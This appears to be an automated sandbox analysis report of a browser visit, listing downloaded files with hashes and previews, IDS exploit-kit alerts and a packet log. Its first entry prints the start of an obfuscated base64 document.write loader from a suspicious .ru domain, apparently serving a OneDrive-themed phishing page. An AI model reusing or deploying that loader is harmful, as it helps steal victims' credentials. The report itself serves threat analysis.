                                                                                                                                                                                                                                                Entropy (8bit):5.87447891367262
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:unumJYUeug53jDDV9Rq9gNHnumJYUeug53jDDV9Rq9PlrRlrl:km5h0gNRm5h0PlrRlrl
                                                                                                                                                                                                                                                MD5:A82003FF566B6F12324CA8E81EDF524C
                                                                                                                                                                                                                                                SHA1:1B1BE6CD1AA2892783866E71DE6F102F8E39303D
                                                                                                                                                                                                                                                SHA-256:B1B3A331B4151AF6C879C0E0BCE2B2381B3C66C962F36CE8AE1B8FB6F1AAADF9
                                                                                                                                                                                                                                                SHA-512:9C634DC7BC115864A289D037F047573EB730DAC7ECDE0C5BAFD439D1BCF2318402AA1506E3C4A7659EBFCF71DC8EFFD73341A2E4EEAD6A3376C632D3998E54BC
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                URL:https://oksu.ertanduzu.ru/gk59Agp/
                                                                                                                                                                                                                                                Preview:<script>../* Success is where preparation and opportunity meet. */..if(atob("aHR0cHM6Ly9vS3NVLmVydGFuZHV6dS5ydS9nazU5QWdwLw==") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxlPg0KYm9keSB7DQogIGJhY2tncm91bmQtY29sb3I6ICNmZmY7DQogIGhlaWdodDogMTAwJTsNC
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                Size (bytes):1237
                                                                                                                                                                                                                                                Entropy (8bit):4.529756812811964
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:t4178BtFtOtvxeT09GIvDvrcRnaP8OYEdXKceGS+DX057ABm9mX84p2eT4:CIBtFAtvxx2RZOYEdPeGS6X05km9gvR4
                                                                                                                                                                                                                                                MD5:8B80CE17A35BC980EDBCA32704FF6D4B
                                                                                                                                                                                                                                                SHA1:A0844CB982A1091BE97A175F6A353FFDDF92A597
                                                                                                                                                                                                                                                SHA-256:83431FA4D894678730F7EA8D0FA1CDE613EC26BD059031BFF95530C5D70A1F10
                                                                                                                                                                                                                                                SHA-512:9494E260B4C0C0EC3982621E9888ED74ED5FA778181F9FF7A15E69A7DA66E5747F4CD7A803F2EB0DDE8E48EA77FF4632BA3200B2385A43996D91144952FD8C39
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                URL:https://s1.wp.com/wp-content/blog-plugins/marketing-bar/images/wpcom-mark.svg
                                                                                                                                                                                                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 812 812.02" fill="#101517"><title>wordpressdotcom-mark-black</title><g id="Layer_2" data-name="Layer 2"><g id="Black_W" data-name="Black W"><path d="M406,0C182.13,0,0,182.13,0,406S182.13,812,406,812,812,629.88,812,406,629.86,0,406,0ZM41,406A363.54,363.54,0,0,1,72.59,257.43L246.71,734.51C124.93,675.35,41,550.48,41,406ZM406,771.06a365.51,365.51,0,0,1-103.12-14.87L412.41,437.92,524.6,745.33a34.54,34.54,0,0,0,2.62,5A364.46,364.46,0,0,1,406,771.06Zm50.3-536.22c22-1.15,41.78-3.46,41.78-3.46,19.67-2.33,17.35-31.24-2.32-30.08,0,0-59.13,4.64-97.3,4.64-35.87,0-96.13-4.64-96.13-4.64-19.69-1.16-22,28.91-2.32,30.08,0,0,18.62,2.31,38.29,3.46l56.86,155.82-79.9,239.58L182.35,234.84c22-1.15,41.77-3.46,41.77-3.46,19.67-2.33,17.34-31.24-2.33-30.08,0,0-59.12,4.64-97.28,4.64-6.85,0-14.93-.18-23.51-.45C166.28,106.4,278.47,41,406,41a363.61,363.61,0,0,1,246.49,95.84c-1.56-.11-3.1-.3-4.72-.3-35.86,0-61.3,31.23-61.3,64.79,0,30.08,17.35,55.52,35.86,85.61,13.87
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):48316
                                                                                                                                                                                                                                                Entropy (8bit):5.6346993394709
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                                                                                                                                                                MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                                                                                                                                                                SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                                                                                                                                                                SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                                                                                                                                                                SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (47691)
                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                Size (bytes):47692
                                                                                                                                                                                                                                                Entropy (8bit):5.4016459163756165
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:768:IXCtQmIutwVHuzZBF6gmXLSOzQDjdxdOQbk6sgEvk/7b39tobLKZUanw81KZLGcD:IGJWHuzZBF6xbGfLsVvy33FUaDW
                                                                                                                                                                                                                                                MD5:9046FDD8B20F930F537279DEDE41E747
                                                                                                                                                                                                                                                SHA1:EBB905F60D71F45D056D42E6096736EA8C2D4BD9
                                                                                                                                                                                                                                                SHA-256:5AAC9E52F80011983676C03AD8120E0369E651E6357D0B05054026A3BC8EC32D
                                                                                                                                                                                                                                                SHA-512:F289C718B32D9E75E5725116D7696070C840426310B2A75E3EE66933E50B85BF738B4015FCFB8BAF7A8545B600B9820D85F8BB41C055FB0877C1420655E5E975
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                URL:https://challenges.cloudflare.com/turnstile/v0/b/787bc399e22f/api.js
                                                                                                                                                                                                                                                Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:U:U
                                                                                                                                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Preview:1
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (24311)
                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                Size (bytes):61205
                                                                                                                                                                                                                                                Entropy (8bit):5.2688212471519895
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:768:1LgWPK/GjGpzylpZVb43mJtBjpM24eFIpyGkdjP+l2bx/ZRpyWQJzsLdpKV1XPRS:1iwVlPVwpYP+qpZGUJhWdArsCb41bc
                                                                                                                                                                                                                                                MD5:B338E1EB08BA3EB2F4197CD2176FEA5F
                                                                                                                                                                                                                                                SHA1:9483071C0C47F431820B465C1955857FFED06ADE
                                                                                                                                                                                                                                                SHA-256:40C8CA95FE9186E250AB421F2741BC67DB7401F81FA59CF065FEEA8315E08610
                                                                                                                                                                                                                                                SHA-512:FCF5126292E638899678304FE99E3587965031F52AEACA89A3F0AC8C3DA72DADC0321FB4775E4D2FD0C001B485540EDCFFEFEB7C989C8EFD03A42420021C6CBB
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                URL:https://s0.wp.com/_static/??-eJx9jtEOgjAMRX/I0egk8mL8FDPmJB1ru7At/D4jAaM+8HhP7rktzFFZ4ew4g09A0mNwqiQ3maEyhfyWxqcTfPWoqBjKgJzAuxyNHbdcdWF4IlvoC4YXWDNJ3Qqf3g4aQj6YtUK0Xg84urT+9QOOxG1fzbEqf7F6D7qfb1p3rb5eOr8AfZ5eQA==
                                                                                                                                                                                                                                                Preview:( function ( g ) {.. var t = {. PLATFORM_WINDOWS: 'windows',. PLATFORM_IPHONE: 'iphone',. PLATFORM_IPOD: 'ipod',. PLATFORM_IPAD: 'ipad',. PLATFORM_BLACKBERRY: 'blackberry',. PLATFORM_BLACKBERRY_10: 'blackberry_10',. PLATFORM_SYMBIAN: 'symbian_series60',. PLATFORM_SYMBIAN_S40: 'symbian_series40',. PLATFORM_J2ME_MIDP: 'j2me_midp',. PLATFORM_ANDROID: 'android',. PLATFORM_ANDROID_TABLET: 'android_tablet',. PLATFORM_FIREFOX_OS: 'firefoxOS',. PLATFORM_MOBILE_GENERIC: 'mobile_generic',.. userAgent : false, // Shortcut to the browser User Agent String.. matchedPlatformName : false, // Matched platform name. False otherwise.. matchedUserAgentName : false, // Matched UA String. False otherwise... init: function() {. try {. t.userAgent = g.navigator.userAgent.toLowerCase();. t.getPlatformName();. t.getMobileUserAgentName();. }.catch ( e ) {. console.error( e );.
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 6 x 5
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):50
                                                                                                                                                                                                                                                Entropy (8bit):3.8488255736198
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:CN+ltRPQEsJen2sSX:xvQEsJ42sSX
                                                                                                                                                                                                                                                MD5:E4D673A55C5656F19EF81563FB10884C
                                                                                                                                                                                                                                                SHA1:1F2D8ED221D39329251AD3A6FF1EDB20B7219443
                                                                                                                                                                                                                                                SHA-256:F3A8992ACB9AB911E0FA4AE12F4B85EF8E61008619F13EE51C7A121FF87F63B1
                                                                                                                                                                                                                                                SHA-512:E0B03411282A979CF772F700D9E5634B0C25C612E380AD33C0D59059B1B479D027016D5BEB148403EF185430DB35F5FAED362F36CE2C8ECAD0E6D8E30CEA97B4
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,............bx..j....;
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:TrueType Font data, 16 tables, 1st "GDEF", 20 names, Microsoft, language 0x409, Copyright 2020 The Epilogue Project Authors (https://github.com/Etcetera-Type-Co/Epilogue)Epilog
                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                Size (bytes):104256
                                                                                                                                                                                                                                                Entropy (8bit):6.403721624510303
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:1536:5TbJe60KLxIG9QyvHaDbicO3OGWGMS6+7/8ooujQA9lGos5c4HqpRVR:5TbJPIcQyPSbKOGWGf/8ooujJ92q7
                                                                                                                                                                                                                                                MD5:4B80975E9BF4C2AB70A77DB1783634C3
                                                                                                                                                                                                                                                SHA1:E90F3A42C2C953D0504F44032DF75D3FCC8BAE3F
                                                                                                                                                                                                                                                SHA-256:E18EC484A43FA3A4843A89C405C9E67838ECF7D2960CC05FD4AA66F779B80626
                                                                                                                                                                                                                                                SHA-512:ACE84F208B62BBE0E76E150E920C492B734689AD1695BCF6F57DEE7A2DCE48F57D4B9B8EA306BE5BC341522F4A8C71A1BB8785D0925BB0CAEB7BF3057EAF9B90
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                URL:https://s2.wp.com/wp-content/themes/pub/fewer/assets/fonts/epilogue_300.ttf
                                                                                                                                                                                                                                                Preview:............GDEF|....!....PGPOS......#...YJGSUB;4....|h....OS/2.b;1.......`STAT.T.".......Dcmap......T....gasp......!.....glyf...........head.r.c.......6hhea.O.Q.......$hmtx.R.Y........loca............maxp.......... name.!.4...@....postX.........+.preph......8.......P.I.M...........+..w.!.%'7'7.7....'.'7'7.7....'.!.!.'7'7.7....'P.....mm.mm.mm.mm.mm.mm.mm.m....Qo.nn.mm.nn.mI.@..g.bb.bb.bb.b.R.bb.bb.bb.b.......bb.aa.bb.b...Z...\........s.3.#.3..5!.Z..........~?.....8.s....mm....Z...\...&.......2.......Z...\...&.......<.%.....Z...\...&.....'.<.%.....2.......Z...\...&.....'.P.v.....<.%.....Z...\...&.....'.<.%.....0.......Z...\...&.....'.<.%.....F.......Z...\...&.....'.<.%.....@.......Z...\...&.......:.......Z...\...&.......7.......Z...\.F.&.......s.....Z...\...&.....'.P.v.....7.......Z...\.F.&.......u.....Z...\.y.&.......8.....Z...\...&.....'.7.......@.......Z...\...&.......H.......Z...\...&.......*.......Z...\.p.&.....'.*.......B.......Z...\...&.......P.v.....Z...\...&.......0.......Z
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                Size (bytes):44420
                                                                                                                                                                                                                                                Entropy (8bit):7.9930459785196675
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:768:RuWBdBzdmGF5UR8NQ0pyG0e87Xs9SgTmNa2AcBqSYw5v7kPlBFiyKO4:RuCZzpZ0LLcB0pAcqw56lK
                                                                                                                                                                                                                                                MD5:14CBB56D24E543433A841EA543B94D9F
                                                                                                                                                                                                                                                SHA1:1FF38C6274F61DB317916AF5DEDA93C5F4407E28
                                                                                                                                                                                                                                                SHA-256:BB476F196C18ABD23FBABA068F11A4D0406DA43ABD677CA33BA08B444BAA13E8
                                                                                                                                                                                                                                                SHA-512:175BC54CF9AFAF45E647356A09301A31B2AD6DD15F9F4FBDAA2CEDC89A7270CAC27FBB17D682E911A5B1996C9DB83E289DF2A47E353630A4DC84C1542CB75CAC
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                URL:https://dnearymedahealthstaffing.wordpress.com/wp-content/uploads/2024/12/onedrive-for-business.webp
                                                                                                                                                                                                                                                Preview:RIFF|...WEBPVP8Lp.../..V..Hn.I. E.......g.2.=......9........,.......k....X.Y.?7&...I...2_ps.%..H.V.tCCuC.>P...5.......U...c:....h.S...q..6.{...F..........dH6.#...~...x..$.!...:.D.h...f..L*.gx.'I....;J..$......-.|TH.=\.\..D.jm.$]~.. ..).'(i[..?..H..2"....Ir$.h.V....l.ES$A...$IR$I.q.9..1T...C..G.c...m#E.c..'....e.+.O......... ..8..\..Y.Jx.c..x.u..X..\.y.+O.....S.J$<.)U..S.)O.*.......@..g.*.......Y3..%..\.....6e.Sz.....?.gF.[G.....I......r..v......'...<.sw...<.b|...{...e.t....|....S..!j..,......W.M.#u....\......6.1go.....Jn=.I..\.....6.*\..}.}l..u....k....<...B.%.:....QQ...^..v.|.T.m0*......@K3.....a{....(a...5..+.{..f...{...VE.un.}..d$*"*.(<.;.....Db.......6.4......s...-X....]x;v.(..t..=.......^0...Y.j...}N...0[#.;...T.q....\........@G.,.".. .zx...........H.....e...[......o..l."b..1...w..e..QQ.A.w..Ad..fU........(.M.7w....5\A....jX..C..(....|...|.l5...l..0h.HR......"b.z..n.(.....a..+....Z_......J.*.[.fK..Y.M.j..s.\...Kn2;..9l;T9.R.T...'..Y.
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (2481), with no line terminators
                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                Size (bytes):2481
                                                                                                                                                                                                                                                Entropy (8bit):4.94221754472716
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:gkypIQ9tRdE4/gsAs+yp6NQ5c3Ktu8S+9RoTmF+ArM84QpboR6YGHFDeGDHSqz5:zypFjH/gsAZyp6S5gWW+9RoTk+Apbv9l
                                                                                                                                                                                                                                                MD5:146180A330CE9E46E1F9ADEE12415931
                                                                                                                                                                                                                                                SHA1:6424EE3AD0E04217AD924F8232C66780FB206917
                                                                                                                                                                                                                                                SHA-256:4E1DDBB805779444AB8A88A9527FEC667FC9686D1247F88727AD3A04B9EC0573
                                                                                                                                                                                                                                                SHA-512:8CD22742BAB345037FAB961B9BC72BF5AD764DBCFADBE6A9FDDB60B982DEEB07C64B4BCB2259EEDBCE6D39794EBD4EB15DECD05335434967AA2A14BB586F8751
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                URL:https://s1.wp.com/wp-content/js/rlt-proxy.js?m=1720530689i
                                                                                                                                                                                                                                                Preview:(function(){var t;var e;var n;var o=[];var i=[];var r=false;var a="jetpack:wpcomRLT";function c(t){if(!Array.isArray(n)){return false}return n.includes(t)}function s(t,e,n){if(e&&typeof e.postMessage==="function"){try{e.postMessage(JSON.stringify({type:"rltMessage",data:{event:"invalidate",token:t,sourceOrigin:window.location.origin}}),n)}catch(t){return}}}window.rltInvalidateToken=function(n,i){if(n===t){t=null}try{if(window.location===window.parent.location&&window.localStorage){if(window.localStorage.getItem(a)===n){window.localStorage.removeItem(a)}}}catch(t){console.info("localstorage access for invalidate denied - probably blocked third-party access",window.location.href)}for(const[t,e]of o){if(t!==i){s(n,e,t)}}if(e&&e!==i&&window.parent){s(n,window.parent,e)}};window.rltInjectToken=function(t,e,n){if(e&&typeof e.postMessage==="function"){try{e.postMessage(JSON.stringify({type:"loginMessage",data:{event:"login",success:true,type:"rlt",token:t,sourceOrigin:window.location.origin}}
                                                                                                                                                                                                                                                No static file info
                                                                                                                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                2024-12-20T16:45:38.837543+01002022112ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 20151192.168.2.1149783192.0.76.3443TCP
                                                                                                                                                                                                                                                2024-12-20T16:45:40.516982+01002022112ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 20151192.168.2.1149794192.0.76.3443TCP
                                                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:13.521718979 CET49676443192.168.2.1120.189.173.3
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:13.833908081 CET49676443192.168.2.1120.189.173.3
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:14.443206072 CET49676443192.168.2.1120.189.173.3
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:14.583905935 CET49671443192.168.2.11204.79.197.203
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:15.646274090 CET49676443192.168.2.1120.189.173.3
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:16.474400043 CET49674443192.168.2.11173.222.162.42
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:16.490047932 CET49673443192.168.2.11173.222.162.42
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:18.052546024 CET49676443192.168.2.1120.189.173.3
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:22.872754097 CET49676443192.168.2.1120.189.173.3
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:24.279073000 CET49671443192.168.2.11204.79.197.203
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:25.799643040 CET49722443192.168.2.11142.250.181.132
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:25.799700022 CET44349722142.250.181.132192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:25.799793005 CET49722443192.168.2.11142.250.181.132
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:25.800719023 CET49722443192.168.2.11142.250.181.132
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:25.800762892 CET44349722142.250.181.132192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:26.076232910 CET49674443192.168.2.11173.222.162.42
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:26.091856003 CET49673443192.168.2.11173.222.162.42
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:27.509402990 CET44349722142.250.181.132192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:27.509790897 CET49722443192.168.2.11142.250.181.132
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:27.509825945 CET44349722142.250.181.132192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:27.511574030 CET44349722142.250.181.132192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:27.511662960 CET49722443192.168.2.11142.250.181.132
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:27.515178919 CET49722443192.168.2.11142.250.181.132
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:27.515296936 CET44349722142.250.181.132192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:27.559633970 CET49722443192.168.2.11142.250.181.132
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:27.559664011 CET44349722142.250.181.132192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:27.606544018 CET49722443192.168.2.11142.250.181.132
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:28.526565075 CET44349706173.222.162.42192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:28.526726007 CET49706443192.168.2.11173.222.162.42
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:29.386997938 CET49733443192.168.2.11192.0.78.13
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:29.387041092 CET44349733192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:29.387104034 CET49733443192.168.2.11192.0.78.13
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:29.387356043 CET49733443192.168.2.11192.0.78.13
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:29.387370110 CET44349733192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:29.387722015 CET49734443192.168.2.11192.0.78.13
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:29.387758017 CET44349734192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:29.387868881 CET49734443192.168.2.11192.0.78.13
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:29.388375044 CET49734443192.168.2.11192.0.78.13
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:29.388390064 CET44349734192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:30.616544962 CET44349733192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:30.618066072 CET44349734192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:30.621331930 CET49733443192.168.2.11192.0.78.13
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:30.621362925 CET44349733192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:30.622910976 CET44349733192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:30.623008013 CET49733443192.168.2.11192.0.78.13
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:30.640841007 CET49734443192.168.2.11192.0.78.13
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:30.640867949 CET44349734192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:30.642497063 CET44349734192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:30.642626047 CET49734443192.168.2.11192.0.78.13
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:30.676503897 CET49733443192.168.2.11192.0.78.13
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:30.676729918 CET44349733192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:30.692826033 CET49734443192.168.2.11192.0.78.13
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:30.692971945 CET44349734192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:30.703084946 CET49733443192.168.2.11192.0.78.13
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:30.703103065 CET44349733192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:30.733762026 CET49734443192.168.2.11192.0.78.13
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:30.733783007 CET44349734192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:30.749798059 CET49733443192.168.2.11192.0.78.13
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:30.779757977 CET49734443192.168.2.11192.0.78.13
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:31.196234941 CET44349733192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:31.203463078 CET44349733192.0.78.13192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:31.203505039 CET44349733192.0.78.13192.168.2.11
